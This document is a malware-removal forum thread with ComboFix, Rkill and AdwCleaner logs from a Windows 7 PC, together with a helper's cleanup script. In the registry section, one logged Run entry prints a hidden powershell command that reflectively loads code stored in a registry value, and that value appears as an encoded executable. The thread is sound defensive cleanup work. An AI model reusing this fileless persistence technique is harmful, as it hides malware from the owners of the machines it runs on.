2014-09-16 21:02 . 2014-05-14 13:17 33792 ----a-w- c:\windows\system32\wuapp.exe
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-15 13:06 . 2011-10-19 21:14 231568 ------w- c:\windows\system32\MpSigStub.exe
2014-08-29 20:34 . 2014-08-29 20:34 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-29 20:22 . 2014-08-29 20:22 33512 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2014-08-29 07:15 . 2010-06-24 15:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-26 18:32 . 2010-11-20 21:29 376832 ----a-w- c:\windows\system32\rpcss.dll
2014-07-25 06:35 . 2014-07-25 06:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-07-19 13:10 . 2011-10-20 14:51 86888 ----a-w- c:\windows\system32\LMIRfsClientNP.dll
2014-07-19 13:10 . 2011-10-20 14:51 53064 ----a-w- c:\windows\system32\Spool\prtprocs\w32x86\LMIproc.dll
2014-07-19 13:10 . 2011-10-20 14:51 31560 ----a-w- c:\windows\system32\LMIport.dll
2014-07-19 13:10 . 2011-10-20 14:51 85832 ----a-w- c:\windows\system32\LMIinit.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt1"]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt2"]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt3"]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt4"]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt5"]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt6"]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt7"]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt8"]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ocx"="c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden [Reflection.Assembly]::Load((gp -Path 'hkcu:software\classes\clsid').OCX).GetType('gm.ks').GetMethod('m').Invoke(0" [X]
"wvxdmfokq"="c:\users\bella\AppData\Local\EmieUserList\wvxdmfokq.dll" [2014-10-03 250880]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IAStorIcon"="c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" [2011-05-20 284440]
"RTHDVCPL"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2011-08-16 10820200]
"NUSB3MON"="c:\program files\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe" [2011-04-14 113288]
"UpdateLBPShortCut"="c:\program files\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe" [2009-05-20 222504]
"CLMLServer"="c:\program files\CyberLink\Power2Go\CLMLSvc.exe" [2009-12-15 103720]
"UpdateP2GoShortCut"="c:\program files\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe" [2009-05-20 222504]
"UCam_Menu"="c:\program files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" [2009-02-18 218408]
"UpdatePSTShortCut"="c:\program files\CyberLink\DVD Suite\MUITransfer\MUIStartMenu.exe" [2010-04-20 222504]
"LogMeIn GUI"="c:\program files\LogMeIn\x86\LogMeInSystray.exe" [2010-09-17 63048]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-09-01 142616]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-09-01 177432]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-09-01 176408]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2011-08-01 1821576]
"itype"="c:\program files\Microsoft IntelliType Pro\itype.exe" [2011-08-10 1313640]
"PC Meter Connect"="c:\program files\Pitney Bowes\PC Meter Connect\mailstationAssistant.exe" [2012-02-07 3514368]
"SBAMTray"="c:\program files\GFI Software\GFIAgent\SBAMTray.exe" [2012-10-16 3226504]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-12-21 959904]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"="c:\program files\SMINST\Launcher.exe" [2010-04-02 237568]
.
c:\users\bella\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\bella\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-9-12 36414624]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SBAMSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SBPIMSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^Users^bella^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2010 Screen Clipper and Launcher.lnk]
path=c:\users\bella\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2010 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2013-12-21 06:04 959904 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BrowserWireless]
2014-09-01 19:52 293376 ----a-w- c:\users\bella\AppData\Local\BrowserWireless\BrowserWireless.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SBAMTray]
2012-10-16 20:29 3226504 ----a-w- c:\program files\GFI Software\GFIAgent\SBAMTray.exe
.
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-05-20 13592]
R2 Intel(R) PROSet Monitoring Service;Intel(R) PROSet Monitoring Service;c:\windows\system32\IProsetMonitor.exe [2011-06-29 112800]
R2 LMIGuardianSvc;LMIGuardianSvc;c:\program files\LogMeIn\x86\LMIGuardianSvc.exe [2014-07-19 375120]
R2 LMIInfo;LogMeIn Kernel Information Provider;c:\program files\LogMeIn\x86\RaInfo.sys [2013-05-24 13624]
R2 MBAMScheduler;MBAMScheduler;c:\progra~1\SAAZOD\Malwarebytes' Anti-Malware\mbamscheduler.exe [2012-09-30 399432]
R2 SAAZDPMACTL;SAAZDPMACTL;c:\progra~1\SAAZOD\SAAZDPMACTL.exe [2011-10-19 86856]
R2 SAAZScheduler;SAAZScheduler;c:\progra~1\SAAZOD\SAAZScheduler.exe [2011-10-19 77824]
R2 SAAZServerPlus;SAAZServerPlus;c:\progra~1\SAAZOD\SAAZServerPlus.exe [2009-04-30 77824]
R2 SAAZWatchDog;SAAZWatchDog;c:\progra~1\SAAZOD\SAAZWatchDog.exe [2011-10-19 86856]
R2 sbapifs;sbapifs;c:\windows\system32\DRIVERS\sbapifs.sys [2012-08-01 66344]
R2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2011-05-04 2656536]
R3 DM150Drv;DM150Drv;c:\windows\system32\DRIVERS\DM150Drv.sys [2010-07-30 20600]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 gfiark;gfiark;c:\windows\system32\drivers\gfiark.sys [2013-05-23 43368]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-09-16 108032]
R3 IntcDAud;Intel(R) Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys [2010-10-15 269824]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2014-10-05 40776]
R3 radpms;Driver for RADPMS Device;c:\windows\system32\DRIVERS\radpms.sys [2010-09-17 13408]
R3 sbwtis;sbwtis;c:\windows\system32\DRIVERS\sbwtis.sys [2012-10-16 75552]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-10-20 1343400]
R4 SAAZapsc;SAAZ RMM Agent Presence-SC;c:\progra~1\SAAZOD\zRealTime\SAAZapsc.exe SAAZapsc [x]
R4 SAAZRemoteSupport;SAAZRemoteSupport;c:\progra~1\SAAZOD\SAAZRemoteSupport.exe [2011-10-19 78664]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 51040]
R4 ZEvtSVC;ZEvtSVC;c:\progra~1\SAAZOD\zSCC\zEvtSVC.exe [2012-11-09 232752]
S2 SAAZappr;SAAZ RMM Agent Presence-PR;c:\progra~1\SAAZOD\zRealTime\SAAZappr.exe SAAZappr [x]
S2 SBAMSvc;VIPRE Business;c:\program files\GFI Software\GFIAgent\SBAMSvc.exe [2012-10-16 3675976]
S2 SBPIMSvc;SB Recovery Service;c:\program files\GFI Software\GFIAgent\SBPIMSvc.exe [2012-10-16 175496]
S3 dc3d;MS Hardware Device Detection Driver (USB);c:\windows\system32\DRIVERS\dc3d.sys [2011-07-28 45288]
S3 MEI;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECI.sys [2010-10-19 41088]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys [2011-06-10 69504]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys [2011-06-10 161664]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-09-25 02:35 1096520 ----a-w- c:\program files\Google\Chrome\Application\37.0.2062.124\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-10-06 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-17 02:35]
.
2014-10-06 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-16 17:50]
.
2014-10-06 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-16 17:50]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
Trusted Zone: ncjar.com\www
TCP: DhcpNameServer = 192.168.0.20
TCP: Interfaces\{C8C75108-648B-43C0-B933-860C92875C7D}: NameServer = 192.168.0.20,8.8.8.8,208.67.222.222
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Approved Extensions]
@Denied: (2) (LocalSystem)
"{2318C2B1-4965-11D4-9B18-009027A5CD4F}"=hex:51,66,7a,6c,4c,1d,38,12,df,c1,0b,
27,57,07,ba,54,e4,0e,43,d0,22,fb,89,5b
"{9030D464-4C02-4ABF-8ECC-5164760863C6}"=hex:51,66,7a,6c,4c,1d,38,12,0a,d7,23,
94,30,02,d1,0f,f1,da,12,24,73,56,27,d2
"{AA58ED58-01DD-4D91-8333-CF10577473F7}"=hex:51,66,7a,6c,4c,1d,38,12,36,ee,4b,
ae,ef,4f,ff,08,fc,25,8c,50,52,2a,37,e3
"{B4F3A835-0E21-4959-BA22-42B3008E02FF}"=hex:51,66,7a,6c,4c,1d,38,12,5b,ab,e0,
b0,13,40,37,0c,c5,34,01,f3,05,d0,46,eb
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:a4,03,e1,5a,85,b1,cf,01
.
[HKEY_USERS\S-1-5-21-336078627-3664855205-978596220-1153_Classes\CLSID]
@DACL=(02 0000)
"Default"=hex:01
"OCX"=hex:4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,
00,40,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-10-06 10:52:27
ComboFix-quarantined-files.txt 2014-10-06 14:52
ComboFix2.txt 2014-09-01 19:44
ComboFix3.txt 2014-08-28 14:13
ComboFix4.txt 2014-08-26 19:26
.
Pre-Run: 421,418,176,512 bytes free
Post-Run: 427,986,157,568 bytes free
.
- - End Of File - - A8B605D167D567FA41CBAF6B19158F5F
5C616939100B85E558DA92B899A0FC36


----------------------------------------------------------------------------------------

Rkill 2.6.8 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
http://www.bleepingcomputer.com/forums/topic308364.html
Program started at: 10/06/2014 10:12:31 AM in x86 mode. (Safe Mode)
Windows Version: Windows 7 Professional Service Pack 1
Checking for Windows services to stop:
* No malware services found to stop.
Checking for processes to terminate:
* No malware processes found to kill.
Checking Registry for malware related settings:
* No issues found in the Registry.
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
Performing miscellaneous checks:
* No issues found.
Checking Windows Service Integrity:
* COM+ Event System (EventSystem) is not Running.
Startup Type set to: Automatic
* Security Center (wscsvc) is not Running.
Startup Type set to: Automatic (Delayed Start)
* Windows Update (wuauserv) is not Running.
Startup Type set to: Automatic (Delayed Start)
Searching for Missing Digital Signatures:
* No issues found.
Checking HOSTS File:
* HOSTS file entries found:
127.0.0.1 localhost
69.25.74.36 MAIL006 #Exchange Hosting 09/02/14 09:28:05
69.25.74.37 MAIL007 #Exchange Hosting 09/02/14 09:28:05
69.25.74.38 BE008 #Exchange Hosting 09/02/14 09:28:05
69.25.74.39 BE009 #Exchange Hosting 09/02/14 09:28:05
69.25.74.40 BE010 #Exchange Hosting 09/02/14 09:28:05
69.25.74.41 BE011 #Exchange Hosting 09/02/14 09:28:05
69.25.74.42 BE012 #Exchange Hosting 09/02/14 09:28:05
69.25.74.43 BE013 #Exchange Hosting 09/02/14 09:28:05
69.25.74.44 BE014 #Exchange Hosting 09/02/14 09:28:05
69.25.75.222 BE015 #Exchange Hosting 09/02/14 09:28:05
69.25.74.46 BE016 #Exchange Hosting 09/02/14 09:28:05
69.25.74.47 BE017 #Exchange Hosting 09/02/14 09:28:05
69.25.74.48 BE018 #Exchange Hosting 09/02/14 09:28:05
69.25.74.49 BE019 #Exchange Hosting 09/02/14 09:28:05
69.25.74.50 BE020 #Exchange Hosting 09/02/14 09:28:05
69.25.74.51 BE021 #Exchange Hosting 09/02/14 09:28:05
69.25.74.52 BE022 #Exchange Hosting 09/02/14 09:28:05
69.25.74.53 BE023 #Exchange Hosting 09/02/14 09:28:05
69.25.74.54 BE024 #Exchange Hosting 09/02/14 09:28:05

20 out of 35 HOSTS entries shown.
Please review HOSTS file for further entries.
Program finished at: 10/06/2014 10:14:55 AM
Execution time: 0 hours(s), 2 minute(s), and 23 seconds(s)



---------------------------------------------------------------------------

# AdwCleaner v3.311 - Report created 06/10/2014 at 10:59:00
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (32 bits)
# Username : bella - NCJAR-NEX-1011
# Running from : C:\download\Cleanup 10-6-14\AdwCleaner.exe
# Option : Clean
***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****
-\\ Internet Explorer v11.0.9600.17280

-\\ Google Chrome v37.0.2062.124
[ File : C:\Users\bella\AppData\Local\Google\Chrome\User Data\Default\preferences ]
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
*************************
AdwCleaner[R0].txt - [8029 octets] - [26/08/2014 14:40:54]
AdwCleaner[R7].txt - [1071 octets] - [06/10/2014 10:56:25]
AdwCleaner[S0].txt - [8272 octets] - [26/08/2014 14:41:52]
AdwCleaner[S6].txt - [998 octets] - [06/10/2014 10:59:00]
########## EOF - C:\AdwCleaner\AdwCleaner[S6].txt - [1057 octets] ##########
 
Powershell.exe keeps getting launched a lot the moment I log in, alongside Pitney Bowes mail meter software, so I've been associating them with each other. Powershell may be getting called by something else, though, in case that's any sort of useful info.

I saw dllhost.exe show up once or twice upon watching the user profile log in, but now there are no more, and I didn't get more than one at the same time, so they may be short-term calls by legit software and services.

So far no return of browser.exe or resident rundll32's or other issues seen previously, which is a good sign.

I will leave everything logged in to return later tonight to take another status report.
 
1. Please open Notepad (Start>All Programs>Accessories>Notepad).

2. Now copy/paste the entire content of the codebox below into the Notepad window:

Code:
File::
c:\windows\system32\vsjnrsv.dll
c:\users\bella\AppData\Local\EmieUserList\wvxdmfokq.dll

Folder::

Driver::
vsjnrsv
wvxdmfokq

Registry::
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wvxdmfokq"=-
"ocx"=-

ClearJavaCache::


3. Save the above as CFScript.txt

4. Close/disable all anti virus and anti malware programs again, so they do not interfere with the running of ComboFix.

5. Then drag the CFScript.txt into ComboFix.exe as depicted in the animation below. This will start ComboFix again.

CFScript.gif



6. After reboot, (in case it asks to reboot), please post the following reports/logs into your next reply:
  • Combofix.txt
 
ComboFix 14-10-04.01 - bella 10/07/2014 4:54.5.4 - x86
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.3493.1698 [GMT -4:00]
Running from: c:\download\Cleanup 10-6-14\ComboFix.exe
Command switches used :: c:\download\Cleanup 10-6-14\CFScript.txt
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
FILE ::
"c:\users\bella\AppData\Local\EmieUserList\wvxdmfokq.dll"
"c:\windows\system32\vsjnrsv.dll"
.
.
((((((((((((((((((((((((( Files Created from 2014-09-07 to 2014-10-07 )))))))))))))))))))))))))))))))
.
.
2014-09-17 12:07 . 2014-10-06 19:54 -------- d-sh--w- c:\users\bella\AppData\Local\EmieUserList
2014-09-17 12:07 . 2014-09-17 12:07 -------- d-sh--w- c:\users\bella\AppData\Local\EmieSiteList
2014-09-17 07:32 . 2014-08-18 21:30 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-09-17 07:31 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-09-17 07:25 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-09-17 07:25 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-09-17 07:25 . 2013-11-23 18:26 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-09-17 07:25 . 2012-02-11 05:37 317440 ----a-w- c:\windows\system32\spoolsv.exe
2014-09-17 04:04 . 2013-11-26 08:16 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-09-16 23:39 . 2014-09-16 23:39 -------- d-s---w- c:\windows\system32\CompatTel
2014-09-16 21:46 . 2014-09-16 21:46 -------- d-----w- c:\windows\Migration
2014-09-16 21:33 . 2014-09-16 21:38 -------- d-----w- c:\windows\system32\MRT
2014-09-16 21:31 . 2012-07-26 03:21 196608 ----a-w- c:\windows\system32\WUDFHost.exe
2014-09-16 21:31 . 2012-07-26 03:20 73216 ----a-w- c:\windows\system32\WUDFSvc.dll
2014-09-16 21:31 . 2012-07-26 03:20 613888 ----a-w- c:\windows\system32\WUDFx.dll
2014-09-16 21:31 . 2012-07-26 03:20 38912 ----a-w- c:\windows\system32\WUDFCoinstaller.dll
2014-09-16 21:31 . 2012-07-26 03:20 172032 ----a-w- c:\windows\system32\WUDFPlatform.dll
2014-09-16 21:31 . 2012-07-26 02:33 66560 ----a-w- c:\windows\system32\drivers\WUDFPf.sys
2014-09-16 21:31 . 2012-07-26 02:32 155136 ----a-w- c:\windows\system32\drivers\WUDFRd.sys
2014-09-16 21:30 . 2014-03-09 21:47 99480 ----a-w- c:\windows\system32\infocardapi.dll
2014-09-16 21:30 . 2014-06-30 22:14 8856 ----a-w- c:\windows\system32\icardres.dll
2014-09-16 21:30 . 2014-03-09 21:47 619672 ----a-w- c:\windows\system32\icardagt.exe
2014-09-16 21:30 . 2014-06-06 06:16 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-09-16 21:24 . 2013-05-10 04:56 12625408 ----a-w- c:\windows\system32\wmploc.DLL
2014-09-16 21:24 . 2013-05-10 03:48 164864 ----a-w- c:\program files\Windows Media Player\wmplayer.exe
2014-09-16 21:20 . 2014-09-16 21:20 1505280 ----a-w- c:\windows\system32\d3d11.dll
2014-09-16 21:11 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-16 21:10 . 2013-01-24 04:47 196328 ----a-w- c:\windows\system32\drivers\fvevol.sys
2014-09-16 21:10 . 2012-08-21 20:12 245760 ----a-w- c:\windows\system32\OxpsConverter.exe
2014-09-16 21:10 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-16 21:10 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-16 21:10 . 2013-08-05 01:56 133056 ----a-w- c:\windows\system32\drivers\ataport.sys
2014-09-16 21:10 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-16 21:10 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-09-16 21:10 . 2014-08-23 01:46 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-09-16 21:10 . 2014-08-23 00:42 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-09-16 21:10 . 2013-10-30 02:19 301568 ----a-w- c:\windows\system32\msieftp.dll
2014-09-16 21:09 . 2013-07-12 10:07 86016 ----a-w- c:\windows\system32\drivers\usbcir.sys
2014-09-16 21:09 . 2012-01-04 08:58 442880 ----a-w- c:\windows\system32\ntshrui.dll
2014-09-16 21:09 . 2013-12-04 02:03 87040 ----a-w- c:\windows\system32\secproc_ssp_isv.dll
2014-09-16 21:09 . 2013-12-04 02:03 87040 ----a-w- c:\windows\system32\secproc_ssp.dll
2014-09-16 21:09 . 2013-12-04 02:03 423936 ----a-w- c:\windows\system32\secproc_isv.dll
2014-09-16 21:09 . 2013-12-04 02:03 428032 ----a-w- c:\windows\system32\secproc.dll
2014-09-16 21:09 . 2013-12-04 02:02 390144 ----a-w- c:\windows\system32\msdrm.dll
2014-09-16 21:09 . 2013-12-04 01:54 510976 ----a-w- c:\windows\system32\RMActivate_ssp.exe
2014-09-16 21:09 . 2013-12-04 01:54 594944 ----a-w- c:\windows\system32\RMActivate_isv.exe
2014-09-16 21:09 . 2013-12-04 01:54 572416 ----a-w- c:\windows\system32\RMActivate.exe
2014-09-16 21:09 . 2013-12-04 01:54 508928 ----a-w- c:\windows\system32\RMActivate_ssp_isv.exe
2014-09-16 21:06 . 2013-11-27 01:14 258560 ----a-w- c:\windows\system32\drivers\usbhub.sys
2014-09-16 21:06 . 2013-11-27 01:13 284672 ----a-w- c:\windows\system32\drivers\usbport.sys
2014-09-16 21:06 . 2013-11-27 01:13 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2014-09-16 21:06 . 2013-11-27 01:13 43520 ----a-w- c:\windows\system32\drivers\usbehci.sys
2014-09-16 21:06 . 2013-11-27 01:13 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys
2014-09-16 21:06 . 2013-11-27 01:13 24064 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2014-09-16 21:06 . 2013-11-27 01:13 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2014-09-16 21:02 . 2014-05-14 16:23 45536 ----a-w- c:\windows\system32\wups2.dll
2014-09-16 21:02 . 2014-05-14 16:23 54240 ----a-w- c:\windows\system32\wuauclt.exe
